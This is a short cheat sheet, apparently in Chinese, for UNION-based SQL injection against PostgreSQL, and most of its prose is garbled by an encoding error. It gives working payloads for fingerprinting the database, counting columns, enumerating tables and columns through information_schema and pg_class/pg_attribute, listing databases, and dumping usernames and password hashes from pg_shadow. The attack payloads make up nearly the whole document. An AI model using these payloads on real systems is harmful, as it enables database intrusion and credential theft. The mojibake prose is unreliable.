postgreSQLעܽ
MSSQL MySQL OracleһЩصִֶ֧Уûfrompostgresûdzû(ʼ˻) ֻsuperusercopyȨע: , /**/
ӷ: %20 , + , /**/ú:
current_database() //ǰݿ
session_user //Ựû
current_user //ǰݿû
user //ǰû
version() //ݿ汾Unionע:
order by nC
and 1=2 union select null,null,nullC
and 1=2 union select beach,null,nullC
and 1=2 union select (select version()),null,nullCȡ,ֶ(°汾information_schema):
group_concat(table_name)
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset nC
and 1=2 union select column_name,null,null from information_schema.columns where table_name=admin limit 1 offset nC
(ϰ汾)
pg_class.oidӦpg_attribute.attrelid
pg_class.relname
pg_attribute.attnameֶselect relname from pg_classȡ
select oid from pg_class where ȡ
select attname from pg_attribute where attrelid=oidֵ ȡֶʵս:
and 1=2 union select relname,null,null from pg_class where relkind=r limit 1 offset 0Crelkind=r'ֻѯͨ
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=r limit 1 offset 0C
oidoid,Ҫͼcastǿתvarchar͡õ1136and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0C
======================================================================
and 1=2 union select datname,null,null from pg_database limit 1 offset 0C
and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0Cݿû
ҳ:
[1]